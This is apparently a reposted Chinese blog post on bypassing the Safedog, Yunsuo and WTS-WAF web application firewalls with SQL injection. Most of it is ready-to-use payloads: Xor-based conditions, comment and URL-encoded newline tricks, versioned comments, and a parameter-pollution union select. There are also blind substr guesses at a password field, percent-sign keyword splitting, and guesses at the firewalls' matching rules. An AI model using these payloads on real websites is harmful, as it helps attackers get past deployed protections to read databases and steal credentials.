安全狗:v4.0.26550
and 1=1,已经2020年了,大多waf都拦截,哈哈
Xor 1=1,Xor 1=2 不拦截
测试发现/*/* 可以过 /*/*and/*/*1=2
if 也不拦截
%23a%0a也可以 %23表示# %0a表示换行
获取字段数:
但是还会拦截一些关键函数,如user(),databse()
所以需要用if等函数进行注入
还可以利用版本注释进行绕过
union /*!01344select*/ 1,2,3%23
发现安全狗不拦截/**/之间的内容
index.php?id=1
bypass:index.php?a=/*&id=1 and 1=2 union select version(),2,3%23*/
云锁:v3.1.18.13
利用安全狗的姿势发现被拦截
还好云锁也一样,对Xor都网开一面
id=2 Xor length(database())=4 云锁不会拦截关键函数
得到数据库:security
这样也是仅仅只能获取到数据库名称,一般提交漏洞是可以的
获取字段:
bypass:xor substr(password,1,1)='t' 只能进行盲猜字段内容
--+/*%0aand 1=2%0a--+*/ 也是可以进行判断,最终没有全部bypass
云锁的一些规则:
/**/替换为空
/*!*/替换为空
匹配的关键有:and,or,updatexml,select xxx from,union xxx select
匹配select xx from的正则应该是:select .*? from
匹配union xx select的正则应该是:union .*? select
WTS-WAF:未知
bypass:id=1 an%d 1=2 只需要在关键词中加%即可绕过
原文地址《SQL Bypass 之安全狗,云锁,WTS-WAF》
发表评论